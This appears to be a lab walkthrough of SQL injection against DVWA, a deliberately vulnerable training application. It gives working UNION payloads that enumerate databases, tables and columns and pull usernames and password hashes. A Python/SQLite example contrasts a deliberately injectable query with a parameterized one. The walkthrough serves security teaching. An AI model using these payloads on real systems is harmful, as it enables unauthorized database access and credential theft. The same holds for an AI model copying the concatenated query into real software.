- Go to the SQL Injection landing page.
- Click view-source to check the source code of the page.
- Type random input to see what kind of output is returned after submitting.
- The basic check for whether a server is vulnerable to SQL injection is a single inverted comma (').
- A server vulnerable to SQL injection would throw the following error if you enter ' as input in the text box:
- You should know basic SQL commands/operations such as SELECT, UNION, ORDER BY, GROUP BY etc.
- In MySQL, anything after '#' up to the end of the line is treated as a comment.
- A schema is a database, so the SCHEMATA table provides information about databases.
Column name | Description |
---|---|
CATALOG_NAME | The name of the catalog to which the schema belongs. This value is always def. |
SCHEMA_NAME | The name of the schema. |
DEFAULT_CHARACTER_SET_NAME | The schema default character set. |
DEFAULT_COLLATION_NAME | The schema default collation. |
SQL_PATH | This value is always NULL. |
DEFAULT_ENCRYPTION | The schema default encryption. |
- Syntax:
SELECT SCHEMA_NAME AS `Database`
FROM INFORMATION_SCHEMA.SCHEMATA
[WHERE SCHEMA_NAME LIKE 'wild']
SHOW DATABASES
[LIKE 'wild']
- We want to find out the name of the database and the names of the users attached to that database.
- Functions to use: database() and user()
- Type the following command to print the database in use and the current user:
2' UNION SELECT database(), user() #
- Type the following SQL injection command to extract the database names:
2' UNION SELECT schema_name, 2 FROM information_schema.schemata #'
- Type the following SQL injection command to extract the table names in the dvwa database:
2' UNION SELECT table_name, 2 FROM information_schema.tables WHERE table_schema = 'dvwa' #'
- Type the following SQL injection command to extract the column names and types of the users table:
2' UNION SELECT column_name, column_type FROM information_schema.columns WHERE table_schema = 'dvwa' AND table_name = 'users' #'
- Type the following SQL injection command to extract the user records from dvwa.users:
2' UNION SELECT CONCAT(user_id, '-', first_name,' ', last_name), CONCAT(user, ':', password) FROM dvwa.users #'
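
Why the single-quote check and the UNION inputs above work, and what removes the problem, shown as an added example (not code from this page or from DVWA). It assumes the lookup builds its query by string concatenation, and uses Python with an in-memory SQLite table as a stand-in for the PHP/MySQL target; the sample rows are constructed, and because SQLite has no '#' comment the input uses '--' instead.

```python
import sqlite3

def make_db():
    """Constructed stand-in for dvwa.users; rows and password values are made up."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, "
               "last_name TEXT, user TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?, ?, ?)", [
        (1, "Alice", "Admin", "alice", "hash-placeholder-1"),
        (2, "Bob", "Builder", "bob", "hash-placeholder-2"),
    ])
    return db

def lookup_vulnerable(db, user_id):
    # Assumed query shape: the input is pasted between quotes, so a quote in
    # the input ends the string literal and the rest is parsed as SQL.
    sql = ("SELECT first_name, last_name FROM users WHERE user_id = '"
           + user_id + "'")
    return db.execute(sql).fetchall()

def lookup_parameterized(db, user_id):
    # The statement text is fixed; the value is bound separately and is only
    # ever compared as data, whatever characters it contains.
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return db.execute(sql, (user_id,)).fetchall()

def quote_check(db, lookup):
    """Submit a lone single quote; 'error' means the input reached the parser."""
    try:
        lookup(db, "'")
        return "ok"
    except sqlite3.OperationalError:
        return "error"

# Same shape as the page's UNION inputs, with SQLite's '--' in place of '#'.
UNION_INPUT = "2' UNION SELECT user, password FROM users --"

if __name__ == "__main__":
    db = make_db()
    for name, fn in (("vulnerable", lookup_vulnerable),
                     ("parameterized", lookup_parameterized)):
        print(name, "quote check:", quote_check(db, fn))
        print(name, "rows:", fn(db, UNION_INPUT))
```

With the parameterized lookup the quote produces no syntax error and the UNION input matches no row, which is also a quick regression check after fixing such a query.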